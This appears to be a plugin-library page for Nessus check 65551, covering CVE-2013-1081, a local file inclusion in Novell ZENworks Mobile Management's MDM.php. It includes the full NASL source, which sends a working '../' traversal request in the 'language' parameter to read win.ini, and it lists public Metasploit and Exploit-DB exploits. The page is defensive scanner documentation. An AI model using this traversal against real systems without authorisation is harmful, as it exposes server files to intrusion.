Novell ZENworks Mobile Management MDM.php Local File Inclusion - Nessus

High   Plugin ID: 65551

This page contains detailed information about the Novell ZENworks Mobile Management MDM.php Local File Inclusion Nessus plugin including available exploits and PoCs found on GitHub, in Metasploit or Exploit-DB for verifying of this vulnerability.

Plugin Overview


ID: 65551
Name: Novell ZENworks Mobile Management MDM.php Local File Inclusion
Filename: novell_zenworks_mobile_management_mdm_lfi.nasl
Vulnerability Published: 2013-03-07
This Plugin Published: 2013-03-14
Last Modification Time: 2021-01-19
Plugin Version: 1.11
Plugin Type: remote
Plugin Family: CGI abuses
Dependencies: novell_zenworks_mobile_management_detect.nasl
Excluded KB Items [?]: Settings/disable_cgi_scanning

Vulnerability Information


Severity: High
Vulnerability Published: 2013-03-07
Patch Published: N/A
CVE [?]: CVE-2013-1081
CPE [?]: cpe:/a:novell:zenworks_mobile_management

Synopsis

The remote host is affected by a local file inclusion vulnerability.

Description

Nessus was able to exploit a local file inclusion vulnerability in the 'language' parameter of Novell ZENworks Mobile Management's 'MDM.php' script by sending a specially crafted HTTP GET request. By providing a directory traversal string, it is possible to access any file on the system accessible by the web server.

Note that hosts affected by this vulnerability are likely affected by a similar vulnerability in 'DUSAP.php'.

Solution

Upgrade to Novell ZENworks Mobile Management 2.7.1 or later, when it becomes available.

Public Exploits


Target Network Port(s): 80
Target Asset(s): Services/www
Exploit Available: True (Metasploit Framework, Exploit-DB, GitHub, Core Impact)
Exploit Ease: Exploits are available

Here's the list of publicly known exploits and PoCs for verifying the Novell ZENworks Mobile Management MDM.php Local File Inclusion vulnerability:

  1. Metasploit: exploit/windows/http/novell_mdm_lfi
    [Novell Zenworks Mobile Managment MDM.php Local File Inclusion Vulnerability]
  2. Metasploit: auxiliary/scanner/http/novell_mdm_creds
    [Novell Zenworks Mobile Device Managment Admin Credentials]
  3. Exploit-DB: exploits/windows/webapps/26012.rb
    [EDB-26012: Novell ZENworks Mobile Device Managment 2.6.1/2.7.0 - Local File Inclusion (Metasploit)]
  4. GitHub: https://github.com/steponequit/CVE-2013-1081
    [CVE-2013-1081: Novell ZENworks Mobile Management - LFI RCE]

Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered as an illegal activity.

WARNING: Beware of using unverified exploits from sources such as GitHub or Exploit-DB. These exploits and PoCs could contain malware. For more information, see how to use exploits safely.

Risk Information


CVSS V2 Vector [?]: AV:N/AC:L/Au:N/C:P/I:P/A:P/E:F/RL:OF/RC:C
CVSS Base Score:7.5 (High)
Impact Subscore:6.4
Exploitability Subscore:10.0
CVSS Temporal Score:6.2 (Medium)
CVSS Environmental Score:NA (None)
Modified Impact Subscore:NA
Overall CVSS Score:6.2 (Medium)

Go back to menu.

Plugin Source


This is the novell_zenworks_mobile_management_mdm_lfi.nasl nessus plugin source code. This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#


include('deprecated_nasl_level.inc');
include('compat.inc');


if (description)
{
  script_id(65551);
  script_version("1.11");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");

  script_cve_id("CVE-2013-1081");
  script_bugtraq_id(58402);

  script_name(english:"Novell ZENworks Mobile Management MDM.php Local File Inclusion");
  script_summary(english:"Tries to exploit local file inclusion vulnerability.");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote host is affected by a local file inclusion vulnerability."
  );
  script_set_attribute(
    attribute:"description",
    value:
"Nessus was able to exploit a local file inclusion vulnerability in the
'language' parameter of Novell ZENworks Mobile Management's 'MDM.php'
script by sending a specially crafted HTTP GET request.  By providing a
directory traversal string, it is possible to access any file on the
system accessible by the web server. 

Note that hosts affected by this vulnerability are likely affected by a
similar vulnerability in 'DUSAP.php'."
  );
  script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-13-087/");
  # https://www.microfocus.com/support-and-services/?utm_medium=301&utm_source=novell.com
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?b1357ad4");
  script_set_attribute(
    attribute:"solution",
    value:
"Upgrade to Novell ZENworks Mobile Management 2.7.1 or later, when it
becomes available."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Novell Zenworks Mobile Managment MDM.php Local File Inclusion Vulnerability');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2013/03/07");
  script_set_attribute(attribute:"plugin_publication_date", value:"2013/03/14");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:novell:zenworks_mobile_management");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.");

  script_dependencies("novell_zenworks_mobile_management_detect.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");

appname = "Novell ZENworks Mobile Management";

port = get_http_port(default:80);

install = get_install_from_kb(
  appname:'novell_zenworks_mobile_management',
  port:port,
  exit_on_fail:TRUE
);

vuln_script = install['dir'] + '/mobile/MDM.php';

file_list = make_list("windows/win.ini",
                      "winnt/win.ini");

traversal = mult_str(str:"../", nb:15);

exploit_request = NULL;
exploit_response = NULL;

foreach file (file_list)
{
  exploit = vuln_script + "?language=res/languages/" + traversal + file;
  res = http_send_recv3(method:"GET",
                        item:exploit,
                        port:port,
                        exit_on_fail:TRUE);

  if (
    "[Mail]" >< res[2] || 
    "[fonts]" >< res[2] ||
    "; for 16-bit app support" >< res[2]
  )
  {
    exploit_request = exploit;
    exploit_response = chomp(res[2]);
    break;
  }
}

if (!isnull(exploit_request))
{
  if (report_verbosity > 0)
  {
    report =
      '\n  Nessus was able to exploit the vulnerability with the following' +
      '\n  request : \n\n' + build_url(port:port, qs:exploit_request) + '\n';

    if (report_verbosity > 1)
    {
      report += '\n  Server Response (contents of win.ini) : \n\n'
                + exploit_response + '\n';
    }
    security_hole(port:port, extra:report);
  }
  else security_hole(port);
  exit(0);
}
else audit(AUDIT_WEB_APP_NOT_AFFECTED, appname, build_url(port:port, qs:'/'));

The latest version of this script can be found in these locations depending on your platform:

  • Linux / Unix:
    /opt/nessus/lib/nessus/plugins/novell_zenworks_mobile_management_mdm_lfi.nasl
  • Windows:
    C:\ProgramData\Tenable\Nessus\nessus\plugins\novell_zenworks_mobile_management_mdm_lfi.nasl
  • Mac OS X:
    /Library/Nessus/run/lib/nessus/plugins/novell_zenworks_mobile_management_mdm_lfi.nasl

Go back to menu.

How to Run


Here is how to run the Novell ZENworks Mobile Management MDM.php Local File Inclusion as a standalone plugin via the Nessus web user interface (https://localhost:8834/):

  1. Click to start a New Scan.
  2. Select Advanced Scan.
  3. Navigate to the Plugins tab.
  4. On the top right corner click to Disable All plugins.
  5. On the left side table select CGI abuses plugin family.
  6. On the right side table select Novell ZENworks Mobile Management MDM.php Local File Inclusion plugin ID 65551.
  7. Specify the target on the Settings tab and click to Save the scan.
  8. Run the scan.

Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.

Basic usage:

/opt/nessus/bin/nasl novell_zenworks_mobile_management_mdm_lfi.nasl -t <IP/HOST>

Run the plugin with audit trail message on the console:

/opt/nessus/bin/nasl -a novell_zenworks_mobile_management_mdm_lfi.nasl -t <IP/HOST>

Run the plugin with trace script execution written to the console (useful for debugging):

/opt/nessus/bin/nasl -T - novell_zenworks_mobile_management_mdm_lfi.nasl -t <IP/HOST>

Run the plugin with using a state file for the target and updating it (useful for running multiple plugins on the target):

/opt/nessus/bin/nasl -K /tmp/state novell_zenworks_mobile_management_mdm_lfi.nasl -t <IP/HOST>

Go back to menu.

References


BID | SecurityFocus Bugtraq ID: See also: Similar and related Nessus plugins:
  • 47581 - Novell 'modulemanager' Servlet Arbitrary File Upload (intrusive check)
  • 47582 - Novell 'modulemanager' Servlet Arbitrary File Upload (safe check)
  • 62968 - Novell Sentinel Log Manager Authentication Bypass
  • 83289 - Novell ZENworks Configuration Management < 11.3.2 Remote Code Execution (intrusive check)
  • 66914 - Novell ZENworks Control Center File Upload Remote Code Execution (intrusive check)
  • 69557 - Novell Client / Client 2 Multiple Vulnerabilities
  • 53536 - Novell File Reporter Agent XML Tag Handling Buffer Overflow
  • 62977 - Novell File Reporter Agent FSFUI UICMD 126 Arbitrary File Download
  • 62026 - Novell File Reporter Agent XML Parsing Remote Code Execution
  • 55471 - Novell File Reporter Engine RECORD Element Tag Parsing Overflow (credentialed check)
  • 55544 - Novell File Reporter Engine RECORD Element Tag Parsing Overflow (uncredentialed check)
  • 43060 - Novell iPrint Client < 5.32 Multiple Overflows
  • 48364 - Novell iPrint Client < 5.42 Multiple Flaws
  • 48407 - Novell iPrint Client < 5.44 Multiple Vulnerabilities
  • 51367 - Novell iPrint Client < 5.56 Multiple Vulnerabilities
  • 56682 - Novell iPrint Client < 5.72 nipplib.dll GetDriverSettings Function Buffer Overflow
  • 31136 - Novell iPrint Control ActiveX (ienipp.ocx) ExecuteRequest() Method Overflow
  • 34049 - Novell iPrint Client ActiveX Control Multiple Vulnerabilities
  • 33227 - Novell iPrint Client for Windows ienipp.ocx ActiveX Multiple Variable Overflow
  • 36103 - Novell NetIdentity Agent < 1.2.4 Arbitrary Pointer De-reference Code Execution
  • 20318 - Novell NetMail IMAP Agent Long Verb Arguments Remote Overflow
  • 29898 - Novell Client nicm.sys Local Privilege Escalation
  • 33481 - Novell Client nwfs.sys Local Privilege Escalation
  • 25952 - Novell Client nwspool.dll RPC Printer Functions Remote Overflow (300870)
  • 23699 - Novell NetWare Client Print Provider (nwspool.dll) Multiple Function Overflow
  • 65722 - Novell ZENworks Control Center File Upload Remote Code Execution
  • 45569 - Novell ZENworks Configuration Management < 10 SP3 Multiple Flaws
  • 58968 - Novell ZENworks Configuration Management PreBoot Service Opcode Request Parsing Vulnerabilities
  • 22903 - Novell eDirectory iMonitor HTTP Protocol Stack (httpstk) Host HTTP Header Remote Overflow
  • 50690 - Novell GroupWise Document Viewer Agent Arbitrary File Download
  • 50694 - Novell GroupWise WebAccess Arbitrary File Download

Version


This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file novell_zenworks_mobile_management_mdm_lfi.nasl version 1.11. For more plugins, visit the Nessus Plugin Library.

Go back to menu.